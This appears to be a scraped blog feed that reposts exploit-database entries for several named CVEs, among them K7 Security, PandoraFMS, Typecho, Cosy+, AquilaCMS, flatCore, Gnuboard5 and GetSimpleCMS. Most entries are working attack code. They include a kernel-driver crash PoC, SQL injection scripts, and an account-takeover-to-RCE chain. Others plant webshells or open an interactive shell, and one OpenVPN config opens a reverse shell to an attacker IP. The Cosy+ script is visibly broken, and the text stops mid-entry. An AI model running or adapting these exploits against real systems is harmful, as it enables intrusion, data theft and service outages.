    # Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) # Date: 13.08.2024 # Author: M. Akil Gündoğan # Vendor Homepage: https://k7computing.com/ # Version: < v17.0.2019 # Tested on: Windows 10 Pro x64 # CVE ID: CVE-2024-36424 # Vulnerability Description: -------------------------------------- In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group. # Technical details and step by step Proof of Concept's (PoC): -------------------------------------- 1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create. 2 - Compile the attached PoC code written in C++ as release on VS 2022. 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD. # Impact: -------------------------------------- An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system. # Advisories: -------------------------------------- K7 Computing recommends that all customers update their products to the corresponding versions shown below: K7 Ultimate Security (17.0.2019 or Higher) # Timeline: -------------------------------------- - 16.05.2024 - Vulnerability reported. - 05.08.2024 - Vendor has fixed the vulnerability. - 13.08.2024 - Released. # References: -------------------------------------- - Vendor: https://www.k7computing.com - Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417 - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424 - Repository: https://github.com/secunnix/CVE-2024-36424 # PoC Code (C++): ------------------------------------------------------------------------------------------------------------------------- /* # Usage: Only compile it and run, boooom :) */ #include <windows.h> #include <iostream> const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014 int main() { std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl; HANDLE hDevice = CreateFile(driverDevice.c_str(), GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr); if (hDevice == INVALID_HANDLE_VALUE) { std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl; return 1; } void* inputBuffer = nullptr; // Null input buffer DWORD inputBufferSize = 0; DWORD bytesReturned; BOOL result = DeviceIoControl(hDevice, ioCTL, inputBuffer, inputBufferSize, nullptr, 0, &bytesReturned, nullptr); if (!result) { std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl; } CloseHandle(hDevice); return 0; }
  14. HireHackking

    CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) # Date: 2024-08-15 # Exploit Author: Raj Nandi # Vendor Homepage: https://codeastro.com/ # Software Link: https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/ # Version: 1.0 # Tested on: Any OS # CVE: CVE-2024-7815 ## Description: A Cross-Site Scripting (XSS) vulnerability exists in [Application Name/Version]. This vulnerability allows an attacker to inject and execute arbitrary JavaScript code within the context of the user's browser session. ## Proof of Concept (PoC): 1. Navigate to [vulnerable page or input field]. 2. Input the following payload: `<script>alert(document.cookie)</script>` 3. Upon execution, the script will trigger and display the user's cookies in an alert box. ## Mitigation: To prevent this vulnerability, ensure that all user inputs are properly sanitized and validated before being reflected back on the webpage.
  15. HireHackking

    PandoraFMS 7.0NG.772 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PandoraFMS 7.0NG.772 - SQL Injection # Date: 21/11/2023 # Exploit Author: Osama Yousef # Vendor Homepage: https://pandorafms.com/ # Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz # Version: v7.0NG.772 # Tested on: Linux # CVE : CVE-2023-44088 import re, requests, argparse, string, random, base64 import urllib3 import html headers = { 'Cache-Control': 'max-age=0', 'Origin': '', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36', 'Accept': '*/*', 'Referer': '' } def login(session, url, username, password): res = session.get(url) csrf = retrieve_csrftoken(res.text) url+= '?login=1' payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}" res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'}) if 'User is blocked' in res.text: print("Login Failed!") exit(1) def exploit(session, url, imagepath, query): url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data" name = random_id(10) payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query) payload=payload.replace(' ', '\t') files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')} # Create a reference to the original _make_request method urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request # Replace the _make_request method with the custom_make_request function urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'}) if 'Created successfully' not in res.text: print("Failed to create a visual console!") exit(1) url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder" res = session.get(url2) x = re.search('(?:<a href=".*">)'+name, res.text) match = x.group() url3 = match.lstrip("<a href=") url3 = url3.split('"')[1] url3 = url3.split("?")[1] url3 = html.unescape(url3) url4 = url+ "?" + url3 res = session.get(url4) x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text) match = x.group() output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"') output = output.split('","backgroundImage')[0] print("Query output: {}".format(output)) def retrieve_csrftoken(response): x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response) match = x.group() csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"') print("CSRF: {}".format(csrf)) return csrf def random_id(len): chars = string.ascii_uppercase + string.ascii_lowercase + string.digits return ''.join(random.choice(chars) for _ in range(len)) def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw): body = httplib_request_kw['body'] if body: body = body.replace(b"%09", b"\t"*3) httplib_request_kw['body'] = body return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw) def main(): ap = argparse.ArgumentParser() ap.add_argument("-t", "--target", required=True, help="Target URI") ap.add_argument("-u", "--username", required=True, help="Username") ap.add_argument("-p", "--password", required=True, help="Password") ap.add_argument("-i", "--image", required=True, help="Image path") ap.add_argument("-q", "--query", required=True, help="SQL Query to execute") ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)") args = vars(ap.parse_args()) session = requests.Session() url = args['target'] if 'pandora_console' not in url: if not url.endswith('/'): url += '/' url += 'pandora_console/' headers['Origin'] = args['target'] headers['Referer'] = args['target'] session.headers.update(headers) proxies = {} if args['proxy'] is not None: if 'https' in args['proxy']: proxies['https'] = args['proxy'] else: proxies['http'] = args['proxy'] session.proxies.update(proxies) login(session, url, args['username'], args['password']) exploit(session, url, args['image'], args['query']) if __name__=='__main__': main()
  16. HireHackking

    Typecho 1.3.0 - Race Condition

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Typecho 1.3.0 - Race Condition # Google Dork: intext:"Powered by Typecho" inurl:/index.php # Date: 18/08/2024 # Exploit Author: Michele 'cyberaz0r' Di Bonaventura # Vendor Homepage: https://typecho.org # Software Link: https://github.com/typecho/typecho # Version: 1.3.0 # Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) # CVE: CVE-2024-35539 # For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ package main import ( "bytes" "fmt" "io" "net/http" "net/url" "os" "strings" "sync" "sync/atomic" "time" "github.com/robertkrimen/otto" ) var ( c int32 = 0 commentsPostInterval int64 = 60 maxThreads int = 1000 wg sync.WaitGroup userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" client *http.Client = &http.Client{ CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse }, } ) func getJSFunction(u string) string { req, err := http.NewRequest("GET", u, nil) if err != nil { fmt.Println("[X] Error creating initial request:", err) return "" } req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending initial request:", err) return "" } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") { fmt.Println("[X] Error finding JavaScript function") return "" } jsFunction := strings.Split(body, "input.value = (")[1] jsFunction = strings.Split(jsFunction, ")();;")[0] return jsFunction } func executeJavaScript(jsFunctionName string, jsFunctionBody string) string { vm := otto.New() _, err := vm.Run(jsFunctionBody) if err != nil { fmt.Println("[X] Error executing JavaScript function:", err) return "" } result, err := vm.Call(jsFunctionName, nil) if err != nil { fmt.Println("[X] Error calling JavaScript function:", err) return "" } returnValue, err := result.ToString() if err != nil { fmt.Println("[X] Error converting JavaScript result to string:", err) return "" } return returnValue } func spamComments(u string, formToken string) { timestamp := time.Now().Unix() for { i := 0 for time.Now().Unix() < timestamp-1 { time.Sleep(250 * time.Millisecond) fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1) } fmt.Printf("\n") for time.Now().Unix() < timestamp+2 { if i < maxThreads { wg.Add(1) go spamRequest(u, formToken, i) i++ } } wg.Wait() fmt.Printf("\n[+] Successfully spammed %d comments\n", c) timestamp = time.Now().Unix() + commentsPostInterval } } func spamRequest(u string, formToken string, i int) { fmt.Printf("\r[*] Spamming comment request %d ", i) defer wg.Done() formData := url.Values{} formData.Set("_", formToken) formData.Set("author", fmt.Sprintf("user_%d", i)) formData.Set("mail", fmt.Sprintf("user%d@test.example", i)) formData.Set("text", fmt.Sprintf("Hello from user_%d", i)) req, err := http.NewRequest("POST", u+"comment", nil) if err != nil { return } req.Header.Set("Referer", u) req.Header.Set("User-Agent", userAgent) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) req.Body = io.NopCloser(strings.NewReader(formData.Encode())) resp, err := client.Do(req) if err != nil { return } if resp.StatusCode == 302 { atomic.AddInt32(&c, 1) } defer resp.Body.Close() } func main() { if len(os.Args) != 2 { fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>") return } fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r") targetUrl := os.Args[1] fmt.Println("[+] Spam target:", targetUrl) fmt.Println("[*] Getting JavaScript function to calculate form token...") jsFunction := getJSFunction(targetUrl) if jsFunction == "" { fmt.Println("[-] Could not get JavaScript function, exiting...") return } fmt.Println("[*] Evaluating JavaScript function to calculate form token...") formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1)) if formToken == "" { fmt.Println("[-] Could not get form token, exiting...") return } fmt.Printf("[+] Form token: %s", formToken) spamComments(targetUrl, formToken) }
  17. HireHackking

    Cosy+ firmware 21.2s7 - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cosy+ firmware 21.2s7 - Command Injection # Google Dork: N/A # Date: 2024-8-20 # Exploit Author: CodeB0ss # Contact: t.me/codeb0ss / uncodeboss@gmail.com # Version: 21.2s7 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-33896 import socket import subprocess import time def configcreator(file_path): with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def l3st(port): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port)) server_socket.listen(1) print(f" - --> Listening_0n_port {port}") client_socket, _ = server_socket.accept() print(" - --> Recevied") while True: data = client_socket.recv(1024) if not data: break print(data.decode()) client_socket.close() server_socket.close() if name == "main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port = 5000 listener_process = subprocess.Popen(['python', '-c', f'from main import start_listener; start_listener({port})']) time.sleep(2) create_malicious_openvpn_config(config) print(f" - --> config_created {config}") GitHub: https://github.com/codeb0ss/CVE-2024-33896-PoC Hey, Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device. Vulnerability Details: Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN paramaters "--up" and "--down", which execute a specified script or executable. Since the process itself runs with the highest privileges (root), this allows the device to be completely compromised.
  18. HireHackking

    AquilaCMS 1.409.20 - Remote Command Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) # Date: 2024-10-25 # Exploit Author: Eui Chul Chung # Vendor Homepage: https://www.aquila-cms.com/ # Software Link: https://github.com/AquilaCMS/AquilaCMS # Version: v1.409.20 # CVE: CVE-2024-48572, CVE-2024-48573 import io import json import uuid import string import zipfile import argparse import requests import textwrap def unescape_special_characters(email): return ( email.replace("[$]", "$") .replace("[*]", "*") .replace("[+]", "+") .replace("[-]", "-") .replace("[.]", ".") .replace("[?]", "?") .replace(r"[\^]", "^") .replace("[|]", "|") ) def get_user_emails(): valid_characters = list( string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~" ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"] emails_found = [] next_emails = ["^"] while next_emails: prev_emails = next_emails next_emails = [] for email in prev_emails: found = False for ch in valid_characters: data = {"email": f"{email + ch}.*"} res = requests.put(f"{args.url}/api/v2/user", json=data) if json.loads(res.text)["code"] == "UserAlreadyExist": next_emails.append(email + ch) found = True if not found: emails_found.append(email[1:]) print(f"[+] {unescape_special_characters(email[1:])}") return emails_found def reset_password(email): data = {"email": email} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) data = {"token": {"$ne": None}, "password": args.password} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) print(f"[+] {unescape_special_characters(email)} : {args.password}") def get_admin_auth_token(emails): for email in emails: data = {"username": email, "password": args.password} res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data) if res.status_code == 200: print(f"[+] Administrator account : {unescape_special_characters(email)}") return json.loads(res.text)["data"] return None def create_plugin(plugin_name): payload = textwrap.dedent( f""" const {{ exec }} = require("child_process"); /** * This function is called when the plugin is desactivated or when we delete it */ module.exports = async function (resolve, reject) {{ try {{ exec("{args.command}"); return resolve(); }} catch (error) {{}} }}; """ ).strip() plugin = io.BytesIO() with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file: zip_file.writestr( f"{plugin_name}/package.json", io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(), ) zip_file.writestr( f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue() ) zip_file.writestr( f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue() ) plugin.seek(0) return plugin def rce(emails): auth_token = get_admin_auth_token(emails) if auth_token is None: print("[-] Administrator account not found") return print("[+] Create malicious plugin") plugin_name = uuid.uuid4().hex plugin = create_plugin(plugin_name) print("[+] Upload plugin") headers = {"Authorization": auth_token} files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")} requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files) print("[+] Find uploaded plugin") headers = {"Authorization": auth_token} data = {"PostBody": {"limit": 0}} res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data) plugin_id = None for data in json.loads(res.text)["datas"]: if data["name"] == plugin_name: plugin_id = data["_id"] print(f"[+] Plugin ID : {plugin_id}") break if plugin_id is None: print("[-] Plugin not found") return print("[+] Deactivate plugin") headers = {"Authorization": auth_token} data = {"idModule": plugin_id, "active": False} res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data) if res.status_code == 200: print("[+] Command execution succeeded") else: print("[-] Command execution failed") def main(): print("[*] Retrieve email addresses") emails = get_user_emails() print("\n[*] Reset password") for email in emails: reset_password(email) print("\n[*] Perform remote code execution") rce(emails) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-u", dest="url", help="Site URL (e.g. www.aquila-cms.com)", type=str, required=True, ) parser.add_argument( "-p", dest="password", help="Password to use for password reset (e.g. HaXX0r3d!)", type=str, default="HaXX0r3d!", ) parser.add_argument( "-c", dest="command", help="Command to execute (e.g. touch /tmp/pwned)", type=str, default="touch /tmp/pwned", ) args = parser.parse_args() main()
  19. HireHackking

    Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) # Google Dork: intext:"Powered by Typecho" inurl:/index.php # Date: 18/08/2024 # Exploit Author: Michele 'cyberaz0r' Di Bonaventura # Vendor Homepage: https://typecho.org # Software Link: https://github.com/typecho/typecho # Version: 1.3.0 # Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) # CVE: CVE-2024-35540 # For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ package main import ( "bufio" "bytes" "crypto/rand" "crypto/sha256" "encoding/base64" "fmt" "net/http" "net/url" "os" "strings" "time" ) var ( postTitle string = "Reflected XSS PoC" postText string = "Hey admin! Look at the draft of this blog post, can I publish it?" userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" client *http.Client = &http.Client{ CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse }, } ) func getEditUrl(u string, cookies string) string { req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil) if err != nil { fmt.Println("[X] Error creating initial request:", err) return "" } req.Header.Set("Cookie", cookies) req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending initial request:", err) return "" } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() if !strings.Contains(body, "<form action=\"") { fmt.Println("[X] Error finding post edit URL") return "" } editUrl := strings.Split(body, "<form action=\"")[1] editUrl = strings.Split(editUrl, "\"")[0] return editUrl } func generateRandomBytes() string { bytes := make([]byte, 64) rand.Read(bytes) return fmt.Sprintf("%x", sha256.Sum256(bytes)) } func getJsCode(password string) string { phpPayload := ` header("X-Random-Token: " . md5(uniqid())); if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") { if (isset($_POST["action"])) { system($_POST["action"]); exit; } } ` phpPayload = fmt.Sprintf(phpPayload, password) jsPayload := ` var i = document.createElement('iframe'); i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php'; i.style.display = 'none'; document.body.appendChild(i); setTimeout(() => { var textarea = i.contentWindow.document.getElementById('content'); if (textarea.value.includes(payload)) return; textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload); var form = i.contentWindow.document.getElementById('theme').submit(); }, 200); ` return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload) } func generatePayload(jsCode string) string { remainder := len(jsCode) % 3 if remainder != 0 { jsCode += strings.Repeat(" ", 3-remainder) } jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode)) return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded) } func createPost(u string, cookies string, payload string) string { formData := url.Values{} formData.Set("title", postTitle) formData.Set("text", payload+"\n"+postText) formData.Set("do", "save") formData.Set("markdown", "1") formData.Set("category%5B%5D", "1") formData.Set("allowComment", "1") formData.Set("allowPing", "1") formData.Set("allowFeed", "1") formData.Set("dst", "60") formData.Set("timezone", "7200") req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode())) if err != nil { fmt.Println("[X] Error creating malicious post creation request:", err) return "" } req.Header.Set("Cookie", cookies) req.Header.Set("User-Agent", userAgent) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1)) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending malicious post creation request:", err) return "" } defer resp.Body.Close() return resp.Header.Get("Location") } func checkInjected(u string) bool { req, err := http.NewRequest("HEAD", u, nil) if err != nil { return false } req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { return false } return resp.Header.Get("X-Random-Token") != "" } func readInput() string { scanner := bufio.NewScanner(os.Stdin) if scanner.Scan() { return scanner.Text() } return "" } func interactiveShell(u string, password string) { for { fmt.Print("$ ") cmd := readInput() formData := url.Values{} formData.Set("CSRFToken", password) formData.Set("action", cmd) req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode())) if err != nil { fmt.Println("[X] Error creating shell request:", err) continue } req.Header.Set("User-Agent", userAgent) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending shell request:", err) continue } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() fmt.Println(body) } } func main() { if len(os.Args) != 3 { fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>") os.Exit(1) } fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r") targetUrl := os.Args[1] cookies := os.Args[2] fmt.Println("[*] Getting post edit URL with CSRF token...") editUrl := getEditUrl(targetUrl, cookies) if editUrl == "" { fmt.Println("[-] Could not get post edit URL, exiting...") return } fmt.Println("[+] Edit URL:", editUrl) password := generateRandomBytes() fmt.Println("[+] Generated password to access the webshell: ", password) fmt.Println("[*] Generating JavaScript code to inject webshell...") jsCode := getJsCode(password) payload := generatePayload(jsCode) fmt.Println("[*] Creating malicious post...") postUrl := createPost(editUrl, cookies, payload) if postUrl == "" || postUrl == "/" { fmt.Println("[-] Could not create malicious post, exiting...") return } previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1) fmt.Println("[+] Malicious post created successfully!") fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl) fmt.Println("[*] Waiting for the admin to visit the preview URL...") for !checkInjected(targetUrl) { time.Sleep(1 * time.Second) } fmt.Println("[+] Webshell injected successfully!") fmt.Println("[+] Enjoy your shell ;)\n") interactiveShell(targetUrl, password) }
  20. HireHackking

    flatCore 1.5 - Cross Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/flatCore/flatCore-CMS # Software Link: https://github.com/flatCore/flatCore-CMS # Version: d3a5168 # Tested on: Ubuntu Windows # CVE : CVE-2019-13961 PoC: <!DOCTYPE html> <html> <head> <title>CSRF PoC</title> </head> <body> <form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="upload_destination" value="../content/files"> <input type="hidden" name="w" value="800"> <input type="hidden" name="h" value="600"> <input type="hidden" name="fz" value="1000"> <input type="hidden" name="unchanged" value="yes"> <input type="file" name="file" value="test.php"> <input type="submit" value="Upload"> </form> </body> </html> [Replace Your Domain Name]
  21. HireHackking

    flatCore 1.5.5 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: flatCore 1.5.5 - Arbitrary File Upload # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/flatCore/flatCore-CMS # Software Link: https://github.com/flatCore/flatCore-CMS # Version: 1.5.5 # Tested on: Ubuntu Windows # CVE : CVE-2019-10652 PoC: 1) 1. Access the flatCore Admin Panel URL: http://flatcore/acp/acp.php Log in with valid administrative credentials. 2. Upload a Malicious PHP File Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel. 3. Intercept and Modify the Upload Request Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request: POST /acp/core/files.upload-script.php HTTP/1.1 Host: flatcore Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150 Content-Length: <calculated length> Cookie: PHPSESSID=<valid_session_id> -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="file"; filename="exploit.php" Content-Type: application/octet-stream <?php // Simple PHP backdoor code echo "Vulnerable File Upload - PoC"; system($_GET['cmd']); ?> -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="upload_destination" ../content/files -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="csrf_token" <valid_csrf_token> -----------------------------735323031399963166993862150 Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session. 4. Verification After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami PoC 2) # PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7 # Target URL: http://flatcore/ # The attacker must be authenticated as an administrator to exploit this vulnerability # Step 1: Log in as an administrator and obtain the CSRF token # You need to obtain the CSRF token manually or through a script since the token is required for the file upload. # Step 2: Upload a malicious PHP file using the file upload feature # Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php echo "<?php phpinfo(); ?>" > shell.php # Upload the PHP file using cURL curl -X POST "http://flatcore/acp/core/files.upload-script.php" \ -H "Content-Type: multipart/form-data" \ -F "file=@shell.php" \ -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \ -F "upload_destination=../content/files" \ -F "file_mode=overwrite" \ -b "PHPSESSID=YOUR_SESSION_ID_HERE" # Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID # Step 3: Access the uploaded malicious PHP file echo "Visit the following URL to execute the uploaded PHP file:" echo "http://flatcore/content/files/shell.php" This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server. [Replace Your Domain Name]
  22. HireHackking

    Gnuboard5 5.3.2.8 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/gnuboard/gnuboard5 # Software Link: https://github.com/gnuboard/gnuboard5 # Version: 5.3.2.8 # Tested on: Ubuntu Windows # CVE : CVE-2020-18662 PoC: 1) POST /install/install_db.php HTTP/1.1 Host: gnuboard Content-Type: application/x-www-form-urlencoded Content-Length: 100 mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)# result: sleep 5s. 2) curl -X POST http://gnuboard/install/install_db.php \ -d "mysql_user=root" \ -d "mysql_pass=password" \ -d "mysql_db=gnuboard_db" \ -d "table_prefix=' OR 1=1--" result: The application does not work. [Replace Your Domain Name and Replace Database Information]
  23. HireHackking

    GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS # Version: 3.3.16 # Tested on: Ubuntu Windows # CVE : CVE-2021-28976 PoC-1: 1)Create a .phar file. 1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?> 2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows: <?php try { // Initialize a new Phar object, name it "archive.phar" $phar = new Phar('archive.phar'); // Set the stub (entry point) for the Phar file, pointing to index.php $phar->startBuffering(); $phar->addFromString('index.php', file_get_contents('index.php')); $phar->setStub($phar->createDefaultStub('index.php')); $phar->stopBuffering(); echo "Phar archive created successfully!"; } catch (Exception $e) { echo "Error: " . $e->getMessage(); } 3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. After running the script, you should find a file named archive.phar in your working directory. 2)Upload file: 1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 2. You can find the file at http://getsimplecms/data/uploads/. 3)Details: "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.", "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.", "Request URL": "http://getsimplecms/admin/upload.php", "Request Method": "POST", "Request Parameters": { "file": 